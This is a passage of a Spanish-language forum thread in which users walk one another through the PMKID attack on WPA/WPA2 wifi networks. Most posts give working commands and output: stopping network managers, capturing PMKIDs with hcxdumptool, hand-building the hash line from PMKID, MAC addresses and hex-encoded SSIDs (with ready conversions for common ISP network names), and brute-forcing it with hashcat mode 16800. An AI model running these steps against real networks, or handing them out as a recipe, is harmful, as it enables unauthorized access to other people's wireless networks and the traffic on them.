El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#26 13-08-2018 22:36:03

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,845

Re: Demostración ataque PMKID - Explicado paso a paso

y sin estar conectado ni en modo monitor, me muestra el mismo mensaje, siendo compatible mi chipset.

Entonces todo apunta a que sea un conflicto con Network Manager... Suele hacer esto si no lo apagamos: Vuelve a "tomar la mano" sobre la interfaz.

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#27 14-08-2018 00:48:47

josep345
Mcmardigan

Registrado: 19-11-2017
Mensajes: 750

Re: Demostración ataque PMKID - Explicado paso a paso

Personalmente no me gusta el método utilizado en este hilo para conseguir el (pmkid) creo que se ha centrado mucho en el método inicial de atom,,ahora hay otros métodos mas efectivos y rápidos,para conseguir el (pmkid)

kcdtv escribió:

Una simple linea de comando con wpa_supplicant y obtienes la PMKID en dos segundos. 0 dependencias, 0 scripts externos y funciona con todos los chipsets.

img

0 problemas en obtener nuestro (pmkid)

img

Ultima edición por josep345 (14-08-2018 01:01:41)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#28 14-08-2018 00:59:17

USUARIONUEVO
Usuario

Registrado: 07-07-2015
Mensajes: 306

Re: Demostración ataque PMKID - Explicado paso a paso

airmon-ng check kill

o bien detienes network-manager

service stop networkmanager

eso por un lado.

y por otro ,  a mi me funciona todo , y mi chip es

RTL8723BE

No creo que el chipset sea tan importante, mas bien creo esa es la lista de lo que ellos han podido probar.

Es mas aun ...

hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1

Ultima edición por USUARIONUEVO (14-08-2018 01:06:39)

Desconectado

#29 14-08-2018 01:06:00

josep345
Mcmardigan

Registrado: 19-11-2017
Mensajes: 750

Re: Demostración ataque PMKID - Explicado paso a paso

No creo que el chipset sea tan importante, mas bien creo esa es la lista de lo que ellos han podido probar.

No veo la necesidad de complicarse la vida, más de lo que se debe para el mismo objetivo. cool


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#30 14-08-2018 01:08:05

USUARIONUEVO
Usuario

Registrado: 07-07-2015
Mensajes: 306

Re: Demostración ataque PMKID - Explicado paso a paso

josep345 escribió:

No creo que el chipset sea tan importante, mas bien creo esa es la lista de lo que ellos han podido probar.

No veo la necesidad de complicarse la vida, más de lo que se debe para el mismo objetivo. cool

y quien dice nada de complicarlo ??

solo digo que aunque un chipset no este en esa lista , que la gente pruebe... no es un requisito SI o SI , que el chipset sea uno de esa lista.
es mas creo que tu tienes el mismo que yo ..

Ademas he editado abajo mi mensaje , si no quieres detener networkmanager, pasa la interface a modo monitor, fin del drama.

http://oi68.tinypic.com/35isyl0.jpg

Ultima edición por USUARIONUEVO (14-08-2018 01:11:28)

Desconectado

#31 14-08-2018 01:36:31

josep345
Mcmardigan

Registrado: 19-11-2017
Mensajes: 750

Re: Demostración ataque PMKID - Explicado paso a paso

si no quieres detener networkmanager, pasa la interface a modo monitor, fin del drama.

Perdonar estoy viendo padre de familia  img no había visto el comentario. tongue

Utilizando solo wireshark en modo captura,sin comandos ni consolas,ni (kill bill networkmanager ) se obtiene el (pmkid) con unos simples clics de ratón. big_smile

Edit:Por eso digo que hay otros metodos mas faciles y rapidos para el mismo fin. img

Es mi punto de vista,cada cual que saque sus conclusiones y las exponga libremente.smile

Ultima edición por josep345 (14-08-2018 01:42:59)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#32 14-08-2018 03:43:34

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

os estáis centrando en la obtención de la pmkid, pero no os estáis centrando en la parte del crackeo,
hashcat necesita de todo el hash para hacer el crackeo, no vale solo con la pmkid

es decir si conseguis con cualquier método la pmkid, solo obteneis eso.

os falta el resto del hash, y el hashcat no produce el crackeo.
así que da igual whiresark, tcpdump, wpa_suplicant, o lo que sea que uséis. no funcionará si el hash no está completo.
PMKID_zpsuztdolv4.png

crackeo con pmkid obtenido directamente con cualquier otro programa = Hash '548154ca641f9c7c2a6284fbc0a80f81': Separator unmatched
No hashes loaded.

[email protected]:~$ '/opt/crack-keys/hashcat/hashcat' -a 3 -m 16800 548154ca641f9c7c2a6284fbc0a80f81 
hashcat (v4.2.1) starting...

* Device #1: This hardware has outdated CUDA compute capability (3.5).
             For modern OpenCL performance, upgrade to hardware that supports
             CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetCurrPcieLinkWidth(): Not Supported

nvmlDeviceGetClockInfo(): Not Supported

nvmlDeviceGetClockInfo(): Not Supported

nvmlDeviceGetTemperatureThreshold(): Not Supported

nvmlDeviceGetTemperatureThreshold(): Not Supported

nvmlDeviceGetUtilizationRates(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GT 710, 500/2001 MB allocatable, 1MCU

Hash '548154ca641f9c7c2a6284fbc0a80f81': Separator unmatched
No hashes loaded.

Started: Tue Aug 14 07:33:41 2018
Stopped: Tue Aug 14 07:33:42 2018

con hash completo cargado

[email protected]:~$ '/opt/crack-keys/hashcat/hashcat' -a 3 -m 16800 /opt/crack-keys/hash/hashv
hashcat (v4.2.1) starting...

* Device #1: This hardware has outdated CUDA compute capability (3.5).
             For modern OpenCL performance, upgrade to hardware that supports
             CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetCurrPcieLinkWidth(): Not Supported

nvmlDeviceGetClockInfo(): Not Supported

nvmlDeviceGetClockInfo(): Not Supported

nvmlDeviceGetTemperatureThreshold(): Not Supported

nvmlDeviceGetTemperatureThreshold(): Not Supported

nvmlDeviceGetUtilizationRates(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GT 710, 500/2001 MB allocatable, 1MCU

Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: /opt/crack-keys/hash/hashv
Time.Started.....: Tue Aug 14 07:38:48 2018 (5 secs)
Time.Estimated...: Next Big Bang (-47 years, 152 days)
Guess.Mask.......: ?1?2?2?2?2?2?2?3 [8]
Guess.Charset....: -1 ?l?d?u, -2 ?l?d, -3 ?l?d*[email protected]_, -4 Undefined 
Guess.Queue......: 1/8 (12.50%)
Speed.Dev.#1.....:     5876 H/s (10.78ms) @ Accel:32 Loops:8 Thr:1024 Vec:1
Recovered........: 0/3 (0.00%) Digests, 0/3 (0.00%) Salts
Progress.........: 0/16600142094336 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/89248075776 (0.00%)
Candidates.#1....: sarierin -> sh1fierd
HWMon.Dev.#1.....: Temp: 57c Fan: 41%

Cracking performance lower than expected?        

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Update your OpenCL runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: /opt/crack-keys/hash/hashv
Time.Started.....: Tue Aug 14 07:38:48 2018 (12 secs)
Time.Estimated...: Next Big Bang (-46 years, 94 days)
Guess.Mask.......: ?1?2?2?2?2?2?2?3 [8]
Guess.Charset....: -1 ?l?d?u, -2 ?l?d, -3 ?l?d*[email protected]_, -4 Undefined 
Guess.Queue......: 1/8 (12.50%)
Speed.Dev.#1.....:     5822 H/s (10.82ms) @ Accel:32 Loops:8 Thr:1024 Vec:1
Recovered........: 0/3 (0.00%) Digests, 0/3 (0.00%) Salts
Progress.........: 65536/16600142094336 (0.00%)
Rejected.........: 0/65536 (0.00%)
Restore.Point....: 0/89248075776 (0.00%)
Candidates.#1....: 1arierin -> 1h1fierd
HWMon.Dev.#1.....: Temp: 59c Fan: 41%

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => 

como podéis observar no le metido diccionarios ni nada, para que haga la fuerza bruta hasta que encuentre la clave, sin importar los dígitos que contenga. hasta agotar los dígitos de 8 a 63 caracteres

con esto se demuestra que teniendo la pmkid solamente no sirve de nada para el crackeo.
para que sea efectivo el ataque, después de mi explicación anterior, os explico como se a de hacer.

cojemos la pmkid obtenida con algun programa, le quitamos los dos puntos (:) espacios, o lo que contenga.
cojemos la mac del router y del adaptador de red y lo mismo, le quitamos los dos puntos.
y convertimos a hexadecimal el nombre de nuestra red (ESSID) igual que lo anterior, sin espacios, ni dos puntos etc.
y lo copiamos a un archivo de texto así:

pmkid*bssid ap*bssid cliente*nombre de red ESSID

y ya podemos hacer el ataque, pero de esta manera lo estamos haciendo todo a mano, sin programas ni leches, tan solo el que usaremos para convertir a hexadecimal el nombre de nuestra red.

os dejo un enlace para convertir online a hexadecimal.
https://www.rapidtables.com/convert/num … erter.html
ejemplos de conversión de nombres de red
vodafoneXXXX = 766F6461666F6E6558585858
   orangeXXXX = 6F72616E676558585858
   jazztelXXXX = 6A617A7A74656C58585858
movistarXXXX = 6D6F76697374617258585858

ya no necesitais ningun programa para hacer el hash.
fijaros en mi imagen anterior y veis como es el hash



P.D. seguro que ahora llega alguno y me pregunta si necesita el adaptador modo monitor o algo similar... jajajajaja

entonces mejor dedicarse a cojer melones en el campo ahora que hace fresquito.

Ultima edición por crash (14-08-2018 16:43:40)

Desconectado

#33 14-08-2018 11:14:26

d1k0w0ns
Expulsado

Registrado: 12-06-2015
Mensajes: 374

Re: Demostración ataque PMKID - Explicado paso a paso

crash escribió:

P.D. seguro que ahora llega alguno y me pregunta si necesita el adaptador modo monitor o algo similar... jajajajaja

pero necesita el adaptador modo monitor o es el modo monitor el que necesita el adaptador, o no xDDDDDDDDDDDD


kcdtv esto esta muy bien cuando sabes la contraseña

hashcat -m 16800 -a 3 hashtocrack diccionario.txt --force

pero si se te olvida la contraseña por sobredosis de burundanga supongo que sera este comando que sale en la web de hashcat

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

no puedo confirmar nada porque no he podido hacer funcionar la super ati no me compila el fglrx como debe y todo son errores estoy de los nervios no consigo revivir la bestia es deprimente,
la unica vez que me funciono con el comando de arriba y añadiendo un --force sin soporte GPU me tardaba 71 dias
me voy reiniciar y seguir intentando

Ultima edición por d1k0w0ns (14-08-2018 11:17:57)

Desconectado

#34 14-08-2018 11:33:39

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

lo puedes hacer sin indicarle mascaras, y te lo hace automatico

hashcat -a 3 -m 16800 /opt/crack-keys/hash/hashv

fijate que no le puesto ningún tipo de máscara, ni llamada a diccionarios, ni nada similar.
solo el tipo de fuerza bruta, y tipo de hash con su archivo.

y en ese comando que has puesto d1k0w0ns lleva dos caracteres fijos (t!)

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Ultima edición por crash (14-08-2018 11:35:06)

Desconectado

#35 14-08-2018 12:04:06

sol666
Usuario

Registrado: 31-08-2017
Mensajes: 44

Re: Demostración ataque PMKID - Explicado paso a paso

crash escribió:
pmkid*bssid ap*bssid cliente*nombre de red ESSID

y ya podemos hacer el ataque, pero de esta manera lo estamos haciendo todo a mano, sin programas ni leches, tan solo el que usaremos para convertir a hexadecimal el nombre de nuestra red.

os dejo un enlace para convertir online a hexadecimal.
https://www.rapidtables.com/convert/num … erter.html
ejemplos de conversión de nombres de red
vodafoneXXXX = 766F6461666F6E6558585858
   orangeXXXX = 6F72616E676558585858
   jazztelXXXX = 6A617A7A74656C58585858
movistarXXXX = 6D6F76697374617258585858

hola,entonces entiendo que el hash completo son 32 caracteres del pmkid,mas 12 de la mac del router,mas 12 del la mac del adaptador wlan mas el nombre de la red pasada a hexadecimal todo junto en un archivo de texto sin extension¿es asi o me equivoco?

Desconectado

#36 14-08-2018 12:14:17

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

si correcto, solo separado por *

Ultima edición por crash (14-08-2018 12:45:17)

Desconectado

#37 14-08-2018 17:36:34

gato
Usuario

Registrado: 13-08-2018
Mensajes: 7

Re: Demostración ataque PMKID - Explicado paso a paso

gato escribió:

Hola en el cuarto paso después de un rato me sale esto

[email protected]:~/pmkid-dependences-master/hcxdumptool# hcxdumptool -o hash -i wlan0 --filterlist=filter.txt --filtermode=2

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
FILTERLIST...............: 1 entries
MAC CLIENT...............: fcc2338c85de (client)
MAC ACCESS POINT.........: 0084ed4ab34b (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63511
ANONCE...................: debee55992a07c486684924a3e9b185404eb64b89a69ebc051985e69cd7d10ac


failed to read packet: Network is down
^C
terminated...

Perdon por mi torpeza se me olvido poner en modo monitor. Gracias a todos por la atención

Desconectado

#38 14-08-2018 17:40:42

Xavi
Usuario

Registrado: 10-07-2017
Mensajes: 101

Re: Demostración ataque PMKID - Explicado paso a paso

No pasa nada, pero es una cosa a tener en cuenta, sobretodo en aquellos chipsets que no soporten modo monitor, para hacer el paso correctamente en modo promiscuo, gracias por tu respuesta.

De todas maneras, lo edité en el tema, para que quede recalcado.

Ultima edición por Xavi (14-08-2018 17:41:22)

Desconectado

#39 14-08-2018 17:43:35

gato
Usuario

Registrado: 13-08-2018
Mensajes: 7

Re: Demostración ataque PMKID - Explicado paso a paso

kcdtv escribió:

Esta es la lista de los chipsets soportados

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter


Tengo esta RTL8188RU y esta  RT3572

Xavi escribió:

No pasa nada, pero es una cosa a tener en cuenta, sobretodo en aquellos chipsets que no soporten modo monitor, para hacer el paso correctamente en modo promiscuo, gracias por tu respuesta.

De todas maneras, lo edité en el tema, para que quede recalcado.

Otra cosa al capturar el pmkid cuanto suele durar, tengo que esperar a que salga FOUND PMKID verdad.

Desconectado

#40 14-08-2018 17:57:56

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

no hace falta citar todo entero, en cada mensaje que pongas.
el tiempo depende de con que programa lo hagas, puedes usar wireshark, tcpdumd, wpa_supplicant, hcxdumptool.

aquí lo importante para el crackeo, es el hash completo. te recomiendo que leas de nuevo el post entero para que lo asimiles
solamente son tres pasos.
* obtener pmkid (con cualquier programa)
* crear el hash (se puede hacer a mano)
* crackear el hash con hashcat.

Desconectado

#41 14-08-2018 18:15:28

Xavi
Usuario

Registrado: 10-07-2017
Mensajes: 101

Re: Demostración ataque PMKID - Explicado paso a paso

Como bien dice el compañero, realmente si te lo miras unas veces, son 3 pasos contados, de todas maneras, en el tema que creó atom, su creador, decía que como mucho 10 minutos, pero eso es como mucho, que en realidad, en un par de segundos en buenas condiciones, lo sacas seguro.

Importante: En el caso de no obtener el PMKID de ningún modo, lo más probable es que no sea vulnerable tu modelo de router.

Ultima edición por Xavi (14-08-2018 18:32:11)

Desconectado

#42 14-08-2018 18:45:26

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,845

Re: Demostración ataque PMKID - Explicado paso a paso

Bueno, bueno... A penas vuelvo y veo que esto está animado.. ¡De lujo! biere
@ gato
Y evita el "re-post": Edita tu mensage anterior en lugar de hacer otro mensaje justo despuès un mensaje tuyo. wink
El compañero crash ha perfectamente resumido la esencia del proceso el mensaje anterior y el "estado del arte". plus_un 
Para ser autónomos del todo, ser capaces de hacer todo sin depender de hashcat, nos falta el ultimo paso, el crack: Molaría montar un programa en C de crack PMKID que tire de todos los cores CPU disponibles.
Otra posibilidad sería probar con Hashcat legacy que funciona con CPU. No he tenido tiempo aún de sentarme, no sé qué tal va. Su desarrolló se detuvo 3 años atrás.
O bien probar con los dirvers opemcl de Intel para CPU.

Desconectado

#43 14-08-2018 21:04:48

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

quiero aclarar que con mi método de construir el hash a mano, no hace falta un sistema operativo en concreto,
se puede hacer desde windows también, con wireshark y con el convertidor online de ascii a hexadecimal que dejé, y luego pasarlo a hashcat en el propio windows, supongo que desde un smartphone se puede con wireshark recojer los datos y pasarlos a un txt para luego crackearla después con hashcat.

gracias por la balanza kcdtv. jejejejeje

Desconectado

#44 14-08-2018 21:23:48

josep345
Mcmardigan

Registrado: 19-11-2017
Mensajes: 750

Re: Demostración ataque PMKID - Explicado paso a paso

crash escribió:

ya está, ya tenéis el hash para pasarlo por hashcat

Gracias Crash. img


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#45 14-08-2018 22:19:47

sol666
Usuario

Registrado: 31-08-2017
Mensajes: 44

Re: Demostración ataque PMKID - Explicado paso a paso

gracias crash por dejarlo tan claro,lastima que mi router zte me de todo 0 y no pueda probar con mi amd sad

Desconectado

#46 15-08-2018 09:33:22

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

Xavi tienes un error tipográfico de escritura

xavi escribió:

Hcxptool: Sirve para convertir los paquetes capturados.

no se sabe si es hcxtool o hcxpcaptool

otra cosa en el paso de conseguir el hash puedes poner el método a mano si lo ves conveniente o si no quieres redactarlo de nuevo, poner un enlace a los mensajes 36 y 37 que se explica el proceso.

y entonces ya si te queda de lujo el manual, ya como tú veas mejor.
en fin... eh, eh, eso es todo amigos.

Desconectado

#47 15-08-2018 09:52:08

d1k0w0ns
Expulsado

Registrado: 12-06-2015
Mensajes: 374

Re: Demostración ataque PMKID - Explicado paso a paso

crash escribió:

l
y en ese comando que has puesto d1k0w0ns lleva dos caracteres fijos (t!)

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

ni me habia dado cuenta de los caracteres fijos, estas seguro que significa eso?
tampoco tengo claro porque deben ser 7 caracteres si la contraseña tiene 20 caracteres
el ejemplo es de aqui https://hashcat.net/forum/thread-7717.html de donde sale todo el bacalao

igualmente todavia me estoy peleando con los drivers porque tirar solo de cpu es morirse ya pueden ser 9 cores o 15
12 dias me tarda lo ultimo que probe, pero vamos a mejor el anterior intento eran 71 dias

alguien sabe cuanto se tardar en crakear con GPU la contraseña olvidada??

muy buena la manera de explicar como pasarlo a un simple txt, lo simple lo mejor
saludos

Desconectado

#48 15-08-2018 09:54:25

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

si claro que estoy seguro, la contraseña crackeada si miras bien los ejemplos que pone atom siempre, es
hashcat!

atom escribió:

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....:  1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

edit: los caracteres el mínimo son 8 entonces seria asi por cada dígito que pongamos en hashcat
?l
si es de 8 pondremos ?l?l?l?l?l?l?l?l
si es de 16 ponemos ?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l
y así sucesivamente, hasta 63 caracteres que es el máximo para wpa.
en la ayuda en la parte de abajo de hashcat lo pone los tipos que hay de máscaras

Ultima edición por crash (15-08-2018 10:02:21)

Desconectado

#49 15-08-2018 09:54:32

Xavi
Usuario

Registrado: 10-07-2017
Mensajes: 101

Re: Demostración ataque PMKID - Explicado paso a paso

Corregido el error, pienso que el manual se explica lo que es el método original, de todas maneras, añadiré los enlaces respecto a tus mensajes.

Ultima edición por Xavi (15-08-2018 09:56:34)

Desconectado

#50 15-08-2018 10:06:05

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Demostración ataque PMKID - Explicado paso a paso

bueno eso entra dentro de la explicación original echa por atom. el cómo se crea el hash
mas que nada te lo comento por la gente, que al usar diferentes tipos de adaptadores usb, para que sepan que se puede hacer a mano, con cualquier método para obtener la pmkid. y luego pasarlo a mano el hash a un texto,
sin instalación de programas, ni complicaciones. pero como te dicho, tú decides.
solo es una sugerencia.

atom escribió:

The content of the written file will look like this:

Quote:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

The columns are the following (all hex encoded):
PMKID
MAC AP
MAC Station
ESSID

Ultima edición por crash (15-08-2018 10:08:51)

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
64 10494 Hoy 04:38:21 por USUARIONUEVO
Pegado:
Pegado:: 3º Sorteo Del Mercadillo!! por josep345
18 376 Ayer 19:33:43 por josep345
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 14 ]
328 22755 25-05-2019 21:49:21 por v1s1t0r
5 501 24-05-2019 22:04:42 por mooooon
3 205 21-05-2019 16:08:16 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: CreMaTLVctm
Usuarios registrados conectados: 0
Invitados conectados: 9

Estadisticas de los foros

Número total de usuarios registrados: 1,503
Número total de temas: 1,320
Número total de mensajes: 13,410

Máx. usuarios conectados: 74 el 13-11-2018 18:47:20